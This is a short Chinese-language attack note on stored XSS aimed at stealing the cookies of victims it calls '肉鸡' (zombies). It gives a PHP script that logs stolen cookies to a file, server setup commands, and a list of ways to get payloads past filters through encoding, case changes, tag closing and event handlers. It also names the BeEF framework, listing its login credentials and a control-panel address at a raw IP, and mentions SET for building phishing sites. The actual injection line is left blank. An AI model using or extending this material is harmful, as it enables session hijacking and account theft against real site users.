XSS脚本（存储型xss获取肉鸡的cookies）
存储型XSS就是在能够提交上传的文本框中提交一些标签代码，这段代码被插入到页面中，肉鸡每次点击这个页面时都会有弹框弹出。（只要点击就会弹框）
反射性XSS顾名思义插入

vim /var/www/html/cookie_rec.php

<?php $cookie = $_GET['cookie']; $log = fopen('cookie.txt',"a"); fwrite($log, $cookie . "\n"); fclose($log); ?>

2、增加目录权限

chown -R www-data.www-data /var/www
3、访问靶机

4、之后，当有人访问这个页面时就会有弹框

存储型Xss排查思路：
1、首先依次排查标签是否被禁用（script、img、iframe等）
绕过思路：

标签大小写
标签转义、双重转义、加密
替换关键字
使用编码（十六进制、二次编码、Unicode编码）
2、测试排查某些符号是否被禁用转义（尖括号、引号、空格、等号）
绕过思路：

对符号进行编码
转义、双重转义、尖括号闭合
加密
使用注释
重音符（`）来包含代码
内嵌TAB、换行符等分割攻击代码
3、检查xss的验证机制，是通过前端验证或是后端验证、还是前后端均验证。
排查思路：

查看HTML源码前端是否存在某些限制文本框长度、符号分割（空格，逗号等）、标签禁用、符号禁用、标签符号过滤等JS或方法
使用burpsuite绕过前端，发起请求
4、针对1、2、3过程的排查，进行针对性的注入
常见注入：

标签闭合
注释、字符转义
事件处理程序
编码
协议绕过
内嵌（TAB、回车）
参考：https://www.freebuf.com/articles/web/153055.html

BeEf工具的使用：

注入的语句：

账号密码：beef : debian4eva
UI地址：http://139.198.21.183:8808/ui/authentication

setookit制作钓鱼网站工具